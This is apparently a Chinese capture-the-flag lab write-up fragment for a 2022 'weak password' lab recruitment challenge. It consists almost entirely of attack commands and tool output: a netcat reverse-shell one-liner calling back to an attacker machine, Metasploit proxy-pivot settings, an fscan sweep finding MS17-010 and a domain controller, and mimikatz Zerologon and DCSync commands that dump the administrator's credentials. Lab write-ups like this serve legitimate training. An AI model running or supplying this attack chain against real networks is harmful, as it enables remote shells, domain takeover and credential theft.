2022弱口令安全实验室招新赛-靶机挑战
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 192.168.144.128 9990 >/tmp/f
setg Proxies socks5:192.168.144.128:1080 #设置全局代理
set ReverseAllowProxy true #这个参数是因为使用全局代理,可能会导致我们的shell无法反弹,所以需要开启。
setg Proxies socks5:192.168.144.136:8888 #设置全局代理
set ReverseAllowProxy true #这个参数是因为使用全局代理,可能会导致我们的shell无法反弹,所以需要开启。
:>fscan.exe -h 192.168.48.1/24
fscan.exe -h 192.168.48.1/24
/ _ \ ___ ___ _ __ __ _ | | __
/ /// __|/ | ‘/ ` |/ | |/ /
/ /\___ \ (| | | (_| | (| <
____/ |___/___|_| __,_|___|_|_
fscan version: 1.6.3
start infoscan
(icmp) Target ‘192.168.48.128’ is alive
(icmp) Target ‘192.168.48.200’ is alive
icmp alive hosts len is: 2
192.168.48.200:139 open
192.168.48.128:139 open
192.168.48.128:88 open
192.168.48.200:445 open
192.168.48.128:445 open
192.168.48.200:135 open
192.168.48.128:135 open
alive ports len is: 7
start vulscan
[+] 192.168.48.200 MS17-010 (Windows Server 2008 R2 Datacenter 7600)
[] 192.168.48.200 WEAK\WIN-S96L5Q5A734 Windows Server 2008 R2 Datacenter 7600
NetInfo:
[*]192.168.48.128
[->]WIN-JK2FG246GEF
[->]192.168.48.128
[] 192.168.48.128 [+]DC WEAK\WIN-JK2FG246GEF Windows Server 2008 R2 Datacenter 7600
[+] 192.168.48.128 MS17-010 (Windows Server 2008 R2 Datacenter 7600)
已完成 9/9
scan end
WIN-JK2FG246GEF$
kiwi_cmd “lsadump::zerologon /target:192.168.48.128 /account:WIN-JK2FG246GEF$” exit
mimikatz.exe “lsadump::zerologon /target:192.168.48.128 /account:DC01$” exit
kiwi_cmd “lsadump::dcsync /domain:WEAK.COM /dc:WIN-JK2FG246GEF.WEAK.COM /user:administrator /authuser:WIN-JK2FG246GEF$ /authdomain:WEAK /authpassword: /authntlm”